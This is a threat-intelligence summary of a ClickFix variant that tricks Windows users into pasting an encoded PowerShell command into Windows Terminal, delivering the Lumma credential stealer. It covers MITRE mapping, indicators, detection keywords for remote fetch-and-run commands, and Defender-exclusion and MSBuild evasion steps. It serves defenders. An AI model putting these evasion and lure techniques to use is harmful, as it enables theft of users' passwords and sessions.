Full Report
Crooks tweak familiar copy-paste ruse so that victims run malicious commands themselves A new twist on the long-running ClickFix scam is now tricking Windows users into launching Windows Terminal and pasting malware into it themselves – handing the credential-stealing Lumma infostealer the keys to their browser vault.…
Analysis Summary
# Tool/Technique: ClickFix (Windows Terminal Variant)
## Overview
This is a sophisticated social engineering technique where attackers trick users into manually executing malicious payloads. By mimicking legitimate troubleshooting or CAPTCHA verification prompts, victims are coerced into using the `Win + X -> I` shortcut to launch Windows Terminal and paste an encoded command. This method bypasses traditional "Run Dialog" (Win + R) monitoring and leverages the victim's own administrative context to deploy the Lumma Infostealer.
## Technical Details
- **Type:** Technique (Social Engineering / Human-Interactive Execution) and Malware (Lumma Stealer)
- **Platform:** Windows 10/11
- **Capabilities:** Credential theft, browser data exfiltration, defense evasion via legitimate administrative tools, and cryptocurrency wallet hijacking.
- **First Seen:** February 2024 (Current variant involving Windows Terminal)
## MITRE ATT&CK Mapping
- **[TA0001 - Initial Access]**
- [T1566.002 - Phishing: Spearphishing Link]
- **[TA0002 - Execution]**
- [T1204.002 - User Execution: Malicious File/Command]
- [T1059.001 - Command and Scripting Interpreter: PowerShell]
- **[TA0005 - Defense Evasion]**
- [T1562.001 - Impair Defenses: Disable or Modify Tools (Microsoft Defender exclusions)]
- [T1027 - Obfuscated Files or Information]
- [T1127.001 - Trusted Developer Utilities Proxy Execution: MSBuild]
- **[TA0006 - Credential Access]**
- [T1555.003 - Credentials from Web Browsers]
- **[TA0011 - Command and Control]**
- [T1584.005 - Compromise Infrastructure: Botnet (Directly query blockchain)]
## Functionality
### Core Capabilities
- **Social Engineering Bypass:** Uses fake browser "verification" or "CAPTCHA" screens to provide a "Copy" button for a malicious PowerShell string.
- **Windows Terminal Exploitation:** Encourages the use of `Win + X -> I` to open Windows Terminal, which is often less scrutinized by users and some behavioral tools than the `cmd.exe` or `Run` prompt.
- **Automated Payload Fetching:** The pasted command automatically downloads auxiliary tools (like renamed 7-Zip) and compressed encrypted payloads.
- **Credential Siphoning:** Specifically targets password vaults and session cookies within Google Chrome and Microsoft Edge.
### Advanced Features
- **EtherHiding:** Utilizes cryptocurrency blockchain infrastructure to host or hide Command and Control (C2) metadata, making it difficult to block via traditional DNS/IP blacklisting.
- **Living-of-the-Land (LotL):** Employs built-in utilities like `MSBuild` and `VBScript` to execute the final infection stages.
- **Defense Impairment:** Automatically adds exclusions to Microsoft Defender to prevent the infostealer from being quarantined during its active phase.
## Indicators of Compromise
- **File Names:** Renamed 7-Zip binaries (e.g., `7z.exe` renamed to random alphanumeric strings), `fix.vbs`, `.bat` files.
- **Network Indicators:**
- Blockchain-related traffic (queries to Ether/Smart Contracts) utilized for C2.
- C2 Domains (Lumma specific): [defanged] `c2-domain[.]example`
- **Behavioral Indicators:**
- `WindowsTerminal.exe` spawning `powershell.exe` with heavily Base64 encoded arguments.
- Modification of Registry keys: `HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths`.
- Unexpected network calls from `MSBuild.exe`.
## Associated Threat Actors
- While the specific group name is often categorized under broader "ClickFix" distributors, the activity is currently associated with:
- **Lumma (LummaC2) Operators/Affiliates**
## Detection Methods
- **Behavioral Detection:**
- Alert on PowerShell commands containing generic keywords like `FromBase64String`, `IEX`, or `DownloadString` originating from a Windows Terminal process parent.
- Monitor for `Win + X` shortcut sequences followed immediately by clipboard paste actions in terminal environments.
- **Signature-based detection:**
- Scan for Lumma Stealer binary signatures in memory (Injected into `chrome.exe` or `msedge.exe`).
- **YARA Rules:**
- Target PowerShell scripts that reference specific "ClickFix" social engineering strings (e.g., "Verification code", "Paste the command below").
## Mitigation Strategies
- **User Education:** Train users to never paste "troubleshooting" or "verification" commands into Windows Terminal or PowerShell prompts from websites.
- **Technical Restrictions:** Disable or restrict PowerShell for non-administrator accounts.
- **Endpoint Protection:** Ensure EDR tools are configured to monitor and alert on suspicious child processes of `WindowsTerminal.exe` and `SystemSettings.exe`.
- **Policy:** Implement "Constrained Language Mode" for PowerShell where possible.
## Related Tools/Techniques
- **Classic ClickFix:** Uses the Win+R (Run) dialog to execute `mshta` or `cmd`.
- **ClearFake:** A predecessor technique using fake browser update prompts.
- **Lumma Stealer:** The primary payload delivered by this infection chain.